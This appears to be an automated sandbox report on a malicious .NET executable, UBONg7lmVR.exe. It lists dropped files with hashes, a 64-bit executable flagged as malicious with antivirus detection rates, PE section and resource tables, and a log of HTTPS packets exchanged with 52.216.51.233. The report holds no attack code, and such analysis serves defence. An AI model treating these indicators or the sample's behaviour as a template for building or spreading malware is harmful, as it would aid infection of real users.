                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Users\user\Desktop\UBONg7lmVR.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):8077824
                                                Entropy (8bit):6.958055025032026
                                                Encrypted:false
                                                SSDEEP:98304:ha48jDV5s44tAbCEAVomRGM6oCRXpqALGFFV/lz8RY5ui2R:haV5s4ZPAunVRZXGxlz8cuF
                                                MD5:A499C507987982C951093E21DF0C0D96
                                                SHA1:FA1A7050198570E016FC4BF3DDD69160E05A8A38
                                                SHA-256:64AAFFE3B4D705B9DDBCE60E8FD8B9829C20438B8C68AE254E185C0F466E0265
                                                SHA-512:0AB3D225FC8901D9CC1719EE61E0CDB444532F8A43B307382E7F3E5D610BCF1D54B5ABEF23649C370E5E960366270D99D94629E47868AE7959522A54D574A27D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 11%
                                                • Antivirus: Virustotal, Detection: 8%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........u......."......~&...................@...........................................`... .............................................. ~.T.............Z.X............0~.......................................................N..............................text...5|&......~&................. ..`.rdata...h'...&..j'...&.............@..@.data.........N.......M.............@....pdata..X.....Z.......Q.............@..@.xdata........[.......R.............@..@/4......).....[.......R.............@..B/19....._.....[.......R.............@..B/32......l....b..n...tY.............@..B/46.....0.....d.......Z.............@..B/65......... d.......Z.............@..B/78.....:.....r.......i.............@..B/90...........{......6r.............@..B.idata..T.... ~.......t.............@....reloc.......0~.......t.............@..B.symtab.......~.......u................B........
                                                Process:C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):19
                                                Entropy (8bit):3.366091329119193
                                                Encrypted:false
                                                SSDEEP:3:hMCE/N:hul
                                                MD5:F92A9EF0567DB794EFBE6CC7D98974CC
                                                SHA1:51728A8A25C4F2805984F294DADCE85E738B90D9
                                                SHA-256:26D96E97CEE88C873CFA14F364E79DAE57265CF8DA97ED1EA65A66A5EC6AD673
                                                SHA-512:14C3C14D4E4D93619C0982BB22BD73930531F510C281BE2E8B1EC6C92F1E1CDCE11AC90F13D8F1F6EE79AAA88711B54AD119A16EE51582A2C6ED4071A5C9684A
                                                Malicious:false
                                                Preview:This is a new file.
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):0.025120815978877453
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:UBONg7lmVR.exe
                                                File size:52'506'624 bytes
                                                MD5:d2db9a159617250a517f9d074ab8f947
                                                SHA1:cdc8efcd77ce4725200f29b9be43dac308a139a1
                                                SHA256:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e
                                                SHA512:f1fba436f68603ce07314292bb63af326ddf4748d0b622b1da5d76c8880ae7c11c80301b339a847c41adb6d83eb95fb7f60b19385f2dcbd4c611d29017998376
                                                SSDEEP:1536:4no014QhBgKrsMGr5G+slCbUuz2KLj3tC7wjsX/jVh5X6XL5X7r0eHoz:4o014QhBgdACFleksXD5K7ln0hz
                                                TLSH:03B72B24D518FD3ADD1282344439E2EE262E1E40A671CC3EBD587E2E5DB33D43761EA6
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~4..........."...0...!.........n0!.. ...@!...@.. ........................!...........`................................
                                                Icon Hash:2d2e3797b72b0b99
                                                Entrypoint:0x361306e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xBB347EF2 [Thu Jul 11 14:49:22 2069 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:v4.0.30319
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3213020 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3214000 | 0x19ea | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3216000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x3211074 | 0x3211200 | 5a666a826e8dc7814dac7f8ff900a201 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x3214000 | 0x19ea | 0x1a00 | 69965859e0a13ab7b1284d0e357f31f9 | False | 0.3487079326923077 | data | 4.665608381406232 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x3216000 | 0xc | 0x200 | e92f29fd0f22a9375098f27ff47f755d | False | 0.044921875 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "!\003\014" | 0.11836963125913882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x32141c0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | | | 0.5675675675675675
RT_ICON | 0x32142e8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | | | 0.476878612716763
RT_ICON | 0x3214850 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | | | 0.46774193548387094
RT_ICON | 0x3214b38 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | | | 0.40794223826714804
RT_GROUP_ICON | 0x32153e0 | 0x3e | data | | | 0.8387096774193549
RT_VERSION | 0x3215420 | 0x3e0 | data | | | 0.35786290322580644
RT_MANIFEST | 0x3215800 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Aug 27, 2024 13:05:48.026648998 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.026665926 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.026671886 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.026695013 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.026793957 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.026820898 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.026849031 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.026851892 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.026870966 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.027229071 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.027270079 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.027283907 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.027287960 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.027334929 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.027527094 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.027553082 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.027584076 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.027587891 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.027618885 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.027633905 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.027637005 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.042664051 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.080903053 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.080916882 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.080970049 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.081011057 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.081016064 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.081054926 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.116898060 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.116910934 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.116951942 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.116991043 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.116997957 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.117037058 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.117266893 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.117280960 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.117331028 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.117347956 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.117379904 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.117402077 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.117827892 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.117844105 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.117887974 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.117892027 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.117914915 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.118134975 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.118145943 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.118199110 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.118205070 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.118330002 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.118345976 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.118375063 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.118379116 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.118407011 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.118628025 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.118654966 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.118685007 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.118690014 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.118710995 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.118752956 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.119118929 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.119132996 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.119167089 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.119184971 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.119189024 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.119204998 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.145422935 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.207645893 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.207663059 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.207743883 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.207762957 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.207768917 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.207784891 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.207803011 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.207817078 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.207823038 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.207850933 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.208550930 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.208594084 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.208615065 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.208619118 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.208657026 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.209068060 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.209081888 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.209120989 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.209135056 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.209140062 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.209161997 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.209167004 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.209182978 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:48.209212065 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:48.209214926 CEST4434973352.216.51.233192.168.2.4
